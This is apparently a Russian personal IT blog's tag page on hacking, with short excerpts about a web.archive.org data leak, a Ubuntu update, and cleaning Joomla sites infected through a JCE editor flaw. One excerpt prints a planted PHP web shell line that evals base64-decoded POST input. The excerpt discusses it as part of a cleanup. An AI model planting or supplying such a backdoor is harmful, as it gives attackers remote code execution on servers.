Сибирь. Сабынич. Айти

о природе, личной жизни и информационных технологиях

взлом

Взломали web.archive.org и мои данные утекли. Mozilla Monitor подтверждает

Сначала прочитал новость о взломе web.archive.org, а потом пришло уведомление от Mozilla Monitor. Этакое подтверждение, что данные таки точно утекли. Сам сервис всё ещё недоступен, поэтому сменить пароль не удаётся 🙂

Первое обновление безопасности Ubuntu 15.04

Не успела выйти новая версия Ubuntu 15.04 (Vivid Vervet), как уже на подходе обновление безопасности. Canonical решили оставаться в тренде и брать от мира открытого ПО самые сливки. В этой версии они решили таки отказаться от своей системы инициализации upstart и перейти на темную сторону на systemd. Естественно, пилить свое и своими силами всегда более […]

Уязвимость Joomla с редактором JCE

В плагине редакторе JCE версии ниже 2.0.11 была обнаружена уязвимость и имеет место быть большая череда взломов с последующим внедрением вредоносного кода в js-файлы.Тот случай, который был виден мной, состоял из следующего кода: document.write(”); Можно попробовать выполнить следующую команду в корне директории сайта, однако она несколько грубоватая find ./ -type f -name “*.js” -exec perl […]

Вирусы на сайте. Поиск и удаление кода.

Тема появления вредоносного кода на страницах сайта очень популярная. Хотел в заголовке добавить “Часть 1”, но потом решил сделать в виде бесконечной истории =) Как уже все должно быть известно, нередко (я бы даже сказал, в большинстве случаев) пользователи сами становятся носителями инфекции (в ботнет-среде таких называют “зомби”). И внедрение кода может происходить следующим способом. […]

Взлом Joomla, внедрение бекдора и очистка от кода

UPD 01.03.2013: Я закрыл возможность комментирования данной записи. Все вопросы по данной теме задавайте на https://ask.sabini.ch. Благодарю за понимание. В конце 2011 года в Joomla была некая уязвимость, которая позволила злоумышленникам положить в директорию images бекдор – файл post.php, следующего содержания <?php eval(base64_decode($_POST[“php”])); ?> После чего основная масса файлов с расширением php (причем, заражалось все […]

Пролистать наверх
Exit mobile version